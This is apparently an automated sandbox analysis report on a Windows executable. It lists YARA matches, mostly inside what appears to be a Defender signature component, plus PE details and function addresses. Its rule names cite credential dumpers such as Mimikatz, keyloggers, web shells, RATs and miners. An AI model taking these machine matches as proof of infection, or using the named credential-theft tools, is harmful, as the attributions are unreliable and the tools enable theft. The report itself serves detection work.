Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BD66B 6_2_022BD66B
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C4C7D 6_2_022C4C7D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B3EE2 6_2_022B3EE2
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BDB60 6_2_022BDB60
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BCF55 6_2_022BCF55
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C3425 6_2_022C3425
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C3032 6_2_022C3032
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C0C06 6_2_022C0C06
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BB24A 6_2_022BB24A
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C010B 6_2_022C010B
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C2F01 6_2_022C2F01
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B0DE2 6_2_022B0DE2
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022C25FC 6_2_022C25FC
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B07F5 6_2_022B07F5
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BD1D3 6_2_022BD1D3
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022BE1D4 6_2_022BE1D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3069278 18_2_00007FF7E3069278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3053728 18_2_00007FF7E3053728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30486BC 18_2_00007FF7E30486BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3049CFC 18_2_00007FF7E3049CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305D038 18_2_00007FF7E305D038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304FF90 18_2_00007FF7E304FF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3051FA8 18_2_00007FF7E3051FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3041420 18_2_00007FF7E3041420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C2480 18_2_00007FF7E30C2480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3076480 18_2_00007FF7E3076480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D34D4 18_2_00007FF7E30D34D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D2504 18_2_00007FF7E30D2504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3070320 18_2_00007FF7E3070320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C837C 18_2_00007FF7E30C837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AE410 18_2_00007FF7E30AE410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BC21C 18_2_00007FF7E30BC21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E308A288 18_2_00007FF7E308A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E306B20C 18_2_00007FF7E306B20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E306A818 18_2_00007FF7E306A818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BB88C 18_2_00007FF7E30BB88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E308490C 18_2_00007FF7E308490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AF76C 18_2_00007FF7E30AF76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C77FC 18_2_00007FF7E30C77FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E306C52C 18_2_00007FF7E306C52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B9520 18_2_00007FF7E30B9520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B7600 18_2_00007FF7E30B7600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30715F8 18_2_00007FF7E30715F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BBC60 18_2_00007FF7E30BBC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3063C87 18_2_00007FF7E3063C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BCCC8 18_2_00007FF7E30BCCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3073CE0 18_2_00007FF7E3073CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3061D00 18_2_00007FF7E3061D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B9B34 18_2_00007FF7E30B9B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3071C10 18_2_00007FF7E3071C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BBA74 18_2_00007FF7E30BBA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E306AA68 18_2_00007FF7E306AA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3070AB0 18_2_00007FF7E3070AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C1950 18_2_00007FF7E30C1950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B944 18_2_00007FF7E304B944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BD9D0 18_2_00007FF7E30BD9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E307502C 18_2_00007FF7E307502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BC034 18_2_00007FF7E30BC034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A7050 18_2_00007FF7E30A7050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BD058 18_2_00007FF7E30BD058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30CB058 18_2_00007FF7E30CB058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B0C8 18_2_00007FF7E304B0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30B7108 18_2_00007FF7E30B7108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E306FFA8 18_2_00007FF7E306FFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305DFB4 18_2_00007FF7E305DFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C5F9C 18_2_00007FF7E30C5F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305EFCC 18_2_00007FF7E305EFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BBE48 18_2_00007FF7E30BBE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A5ED0 18_2_00007FF7E30A5ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A1D78 18_2_00007FF7E30A1D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30BDD9C 18_2_00007FF7E30BDD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A2DD4 18_2_00007FF7E30A2DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30C1E00 18_2_00007FF7E30C1E00
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: 1gPmnCR2PX.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Section loaded: phoneinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Section loaded: edgegdi.dll
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to behavior
Uses 32bit PE files
Source: 1gPmnCR2PX.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e61fb1a.216.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fecf96e.186.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5ee7709e.60.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f17d101.92.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fb37126.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f94bc01.210.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fcdeb9e.86.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e9002fe.65.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e1d7add.180.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fed0d72.115.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e1d6a89.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe6a936.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e7207f6.69.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fece56a.117.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
